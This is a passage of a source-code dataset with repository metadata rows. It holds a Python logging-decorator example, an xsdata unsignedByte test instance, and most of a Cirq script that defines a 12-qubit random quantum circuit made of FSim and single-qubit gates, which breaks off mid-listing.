| |
a5dbdb6f26c7bfee74ad32ab213debd273d682df | b92c39c8498e0c6579a65430e63b7db927d01aea | /python/cookbook/decorator_3.py | d19549b43373954c5dcf57ea393088dd0dcf6812 | []
| no_license | szqh97/test | 6ac15ad54f6d36e1d0efd50cbef3b622d374bb29 | ba76c6ad082e2763554bdce3f1b33fea150865dc | refs/heads/master | 2020-04-06T05:40:55.776424 | 2019-01-14T06:37:38 | 2019-01-14T06:37:38 | 14,772,703 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from functools import wraps, partial
import logging
def logged(func=None, *, level=logging.DEBUG, name=None, message=None):
if func is None:
return partial(logged, level=level, name=name, message=message)
logname = name if name else func.__module__
log = logging.getLogger(logname)
logmsg = message if message else func.__name__
@wraps(func)
def wrapper(*args, **kwargs):
log.log(level, logmsg)
return func(*args, **kwargs)
return wrapper
@logged()
def add(x, y):
return x + y
@logged(level=logging.CRITICAL, name='example')
def spam():
print('Spam')
| [
"[email protected]"
]
| |
1187a68a19b872d637c6b16caef681ea72ae907f | ad13583673551857615498b9605d9dcab63bb2c3 | /output/instances/msData/datatypes/Facets/unsignedByte/unsignedByte_totalDigits003.py | 95d57599df105ea2f4f13dfa3f01a81276e9e890 | [
"MIT"
]
| permissive | tefra/xsdata-w3c-tests | 397180205a735b06170aa188f1f39451d2089815 | 081d0908382a0e0b29c8ee9caca6f1c0e36dd6db | refs/heads/main | 2023-08-03T04:25:37.841917 | 2023-07-29T17:10:13 | 2023-07-30T12:11:13 | 239,622,251 | 2 | 0 | MIT | 2023-07-25T14:19:04 | 2020-02-10T21:59:47 | Python | UTF-8 | Python | false | false | 162 | py | from output.models.ms_data.datatypes.facets.unsigned_byte.unsigned_byte_total_digits003_xsd.unsigned_byte_total_digits003 import Test
obj = Test(
foo=123
)
| [
"[email protected]"
]
| |
7ad882dffba848593ced53b6c630af79d96bd3b8 | 75d258d0cc8b07134a3db656a16e8c27557e3572 | /n12_m14/circuit_n12_m14_s6_e6_pEFGH.py | 97fdd8fcfb80bed2805d9ebf6bf2f4aeea17ce97 | []
| no_license | tonybruguier/martinis_et_al_data | 7c5acee8cb18586607c0ffdc25bc9b616e0847be | 1a35e6712c5bd4b48ef0027707b52dd81e5aa3f3 | refs/heads/master | 2023-02-23T09:36:24.179239 | 2021-01-24T20:23:04 | 2021-01-24T20:23:04 | 332,266,881 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45,838 | py | import cirq
import numpy as np
QUBIT_ORDER = [
cirq.GridQubit(3, 3),
cirq.GridQubit(3, 4),
cirq.GridQubit(3, 5),
cirq.GridQubit(3, 6),
cirq.GridQubit(4, 3),
cirq.GridQubit(4, 4),
cirq.GridQubit(4, 5),
cirq.GridQubit(4, 6),
cirq.GridQubit(5, 3),
cirq.GridQubit(5, 4),
cirq.GridQubit(5, 5),
cirq.GridQubit(5, 6),
]
CIRCUIT = cirq.Circuit(
[
cirq.Moment(
operations=[
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 6)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 4)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 6)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 3)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 0.2767373377033284).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -0.18492941569567625).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -0.33113463396189063).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 0.40440704518468423).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.5862983338115253, phi=0.5200148508319427).on(
cirq.GridQubit(3, 4), cirq.GridQubit(3, 5)
),
cirq.FSimGate(theta=1.5346175385256955, phi=0.5131039467233695).on(
cirq.GridQubit(5, 4), cirq.GridQubit(5, 5)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -0.6722145774944012).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 0.7640224995020534).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 0.049341949396894985).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 0.02393046182589869).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
(cirq.X ** 0.5).on(cirq.GridQubit(3, 3)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 5)
),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 6)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 6)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 4)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 5)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -4.480708067260001).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 4.525888267898699).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * 2.135954522972214).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -2.1822665205802965).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -3.7780476633662574).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 3.817335880513747).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * 0.7811374803446167).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * -0.6780279413275597).on(cirq.GridQubit(5, 4)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.541977006124425, phi=0.6073798124875975).on(
cirq.GridQubit(3, 5), cirq.GridQubit(3, 6)
),
cirq.FSimGate(theta=1.5138652502397498, phi=0.47710618607286504).on(
cirq.GridQubit(4, 3), cirq.GridQubit(4, 4)
),
cirq.FSimGate(theta=1.5849169442855044, phi=0.54346233613361).on(
cirq.GridQubit(4, 5), cirq.GridQubit(4, 6)
),
cirq.FSimGate(theta=1.5398075246432927, phi=0.5174515645943538).on(
cirq.GridQubit(5, 3), cirq.GridQubit(5, 4)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 5.048199817882042).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -5.0030196172433445).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * -2.6543362735839113).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 2.6080242759758283).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 3.9045088495271663).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -3.8652206323796765).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * -1.5516585295358842).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * 1.6547680685529413).on(cirq.GridQubit(5, 4)),
]
),
cirq.Moment(
operations=[
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 3)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 6)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 4)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 6)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 3)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -3.2786928385561493).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 3.339006443218924).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * -5.390755870544794).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 5.4172568990486605).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 4.367652291347506).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * -3.9105776028384707).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.589821065740506, phi=0.5045391214115686).on(
cirq.GridQubit(4, 3), cirq.GridQubit(5, 3)
),
cirq.FSimGate(theta=1.5472406430590444, phi=0.5216932173558055).on(
cirq.GridQubit(4, 4), cirq.GridQubit(5, 4)
),
cirq.FSimGate(theta=1.5707871303628709, phi=0.5176678491729374).on(
cirq.GridQubit(4, 6), cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 2.9425087256630427).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -2.882195121000268).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * 4.466531408750767).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -4.440030380246901).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -4.89701654221443).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * 5.354091230723465).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 3)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 6)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 6)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 3)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 12.703597923836748).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * -12.7869629079138).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 3.782562501914174).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -3.873596611893716).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 4.772639843256901).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * -4.771314675186062).on(cirq.GridQubit(4, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.4668587973263782, phi=0.4976074601121169).on(
cirq.GridQubit(3, 3), cirq.GridQubit(4, 3)
),
cirq.FSimGate(theta=1.603651215218248, phi=0.46649538437100246).on(
cirq.GridQubit(3, 5), cirq.GridQubit(4, 5)
),
cirq.FSimGate(theta=1.6160334279232749, phi=0.4353897326147861).on(
cirq.GridQubit(3, 6), cirq.GridQubit(4, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -12.477250219528523).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * 12.39388523545147).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -5.4898636407973544).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 5.398829530817813).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -5.863871460773714).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * 5.8651966288445525).on(cirq.GridQubit(4, 6)),
]
),
cirq.Moment(
operations=[
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 3)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 6)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 4)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 6)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 3)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 5.16073733770325).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -5.068929415695599).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -3.587134633961795).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 3.6604070451845887).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.5862983338115253, phi=0.5200148508319427).on(
cirq.GridQubit(3, 4), cirq.GridQubit(3, 5)
),
cirq.FSimGate(theta=1.5346175385256955, phi=0.5131039467233695).on(
cirq.GridQubit(5, 4), cirq.GridQubit(5, 5)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -5.556214577494324).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 5.648022499501975).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 3.305341949396799).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -3.232069538174005).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 3)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 6)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 6)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 4)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 5)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 7.565359127187911).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * -7.506809626368408).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -15.28470806725993).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 15.329888267898626).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * 7.019954522972137).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -7.066266520580219).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -13.842047663366333).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 13.881335880513822).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * 3.001137480344569).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * -2.8980279413275123).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 5.563573798571002).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * -5.8504123921354285).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.2947043217999283, phi=0.4859467238431821).on(
cirq.GridQubit(3, 3), cirq.GridQubit(3, 4)
),
cirq.FSimGate(theta=1.541977006124425, phi=0.6073798124875975).on(
cirq.GridQubit(3, 5), cirq.GridQubit(3, 6)
),
cirq.FSimGate(theta=1.5138652502397498, phi=0.47710618607286504).on(
cirq.GridQubit(4, 3), cirq.GridQubit(4, 4)
),
cirq.FSimGate(theta=1.5849169442855044, phi=0.54346233613361).on(
cirq.GridQubit(4, 5), cirq.GridQubit(4, 6)
),
cirq.FSimGate(theta=1.5398075246432927, phi=0.5174515645943538).on(
cirq.GridQubit(5, 3), cirq.GridQubit(5, 4)
),
cirq.FSimGate(theta=1.4593314109380113, phi=0.5230636172671492).on(
cirq.GridQubit(5, 5), cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -7.378072351850649).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * 7.436621852670151).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 15.852199817881967).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -15.80701961724327).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * -7.538336273583833).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 7.492024275975751).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 13.968508849527241).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -13.929220632379753).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * -3.771658529535837).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * 3.874768068552894).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -5.593307215154117).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * 5.30646862158969).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 4)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 6)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 4)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 6)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 3)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -8.162692838556204).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 8.223006443218978).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * -12.938755870544817).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 12.965256899048683).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -12.724144773112773).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 12.73446915351482).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * 11.027652291347495).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * -10.570577602838458).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.589821065740506, phi=0.5045391214115686).on(
cirq.GridQubit(4, 3), cirq.GridQubit(5, 3)
),
cirq.FSimGate(theta=1.5472406430590444, phi=0.5216932173558055).on(
cirq.GridQubit(4, 4), cirq.GridQubit(5, 4)
),
cirq.FSimGate(theta=1.5124128267683938, phi=0.5133142626030278).on(
cirq.GridQubit(4, 5), cirq.GridQubit(5, 5)
),
cirq.FSimGate(theta=1.5707871303628709, phi=0.5176678491729374).on(
cirq.GridQubit(4, 6), cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 7.826508725663096).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -7.7661951210003215).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * 12.014531408750791).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -11.988030380246926).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 11.590471496440383).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -11.580147116038336).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * -11.55701654221442).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * 12.014091230723457).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
(cirq.X ** 0.5).on(cirq.GridQubit(3, 3)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 6)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 6)
),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 3)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 26.023597923836856).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * -26.106962907913907).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 25.356253063938887).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -25.2805848307585).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 8.370562501914259).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -8.461596611893802).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 10.100639843256841).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * -10.099314675186001).on(cirq.GridQubit(4, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.4668587973263782, phi=0.4976074601121169).on(
cirq.GridQubit(3, 3), cirq.GridQubit(4, 3)
),
cirq.FSimGate(theta=1.47511091993527, phi=0.538612093835262).on(
cirq.GridQubit(3, 4), cirq.GridQubit(4, 4)
),
cirq.FSimGate(theta=1.603651215218248, phi=0.46649538437100246).on(
cirq.GridQubit(3, 5), cirq.GridQubit(4, 5)
),
cirq.FSimGate(theta=1.6160334279232749, phi=0.4353897326147861).on(
cirq.GridQubit(3, 6), cirq.GridQubit(4, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -25.79725021952863).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * 25.713885235451578).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -24.48288974563276).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 24.55855797881315).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -10.07786364079744).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 9.986829530817898).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -11.191871460773655).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * 11.193196628844492).on(cirq.GridQubit(4, 6)),
]
),
cirq.Moment(
operations=[
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 4)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 6)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 4)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 6)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 3)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 10.044737337703173).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -9.952929415695523).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -8.401251133882973).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 8.52245467467511).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -6.843134633961698).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 6.916407045184491).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.5862983338115253, phi=0.5200148508319427).on(
cirq.GridQubit(3, 4), cirq.GridQubit(3, 5)
),
cirq.FSimGate(theta=1.5289739216684795, phi=0.5055240639761313).on(
cirq.GridQubit(4, 4), cirq.GridQubit(4, 5)
),
cirq.FSimGate(theta=1.5346175385256955, phi=0.5131039467233695).on(
cirq.GridQubit(5, 4), cirq.GridQubit(5, 5)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -10.440214577494247).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 10.5320224995019).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 8.199075778124648).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -8.07787223733251).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 6.561341949396702).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -6.48806953817391).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 6)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 3)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 6)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 12.597359127188014).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * -12.538809626368511).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -26.08870806725985).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 26.13388826789855).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * 11.90395452297206).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -11.950266520580142).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -23.906047663366408).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 23.945335880513902).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * 5.221137480344522).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * -5.118027941327464).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 9.263573798570924).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * -9.55041239213535).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.2947043217999283, phi=0.4859467238431821).on(
cirq.GridQubit(3, 3), cirq.GridQubit(3, 4)
),
cirq.FSimGate(theta=1.541977006124425, phi=0.6073798124875975).on(
cirq.GridQubit(3, 5), cirq.GridQubit(3, 6)
),
cirq.FSimGate(theta=1.5138652502397498, phi=0.47710618607286504).on(
cirq.GridQubit(4, 3), cirq.GridQubit(4, 4)
),
cirq.FSimGate(theta=1.5849169442855044, phi=0.54346233613361).on(
cirq.GridQubit(4, 5), cirq.GridQubit(4, 6)
),
cirq.FSimGate(theta=1.5398075246432927, phi=0.5174515645943538).on(
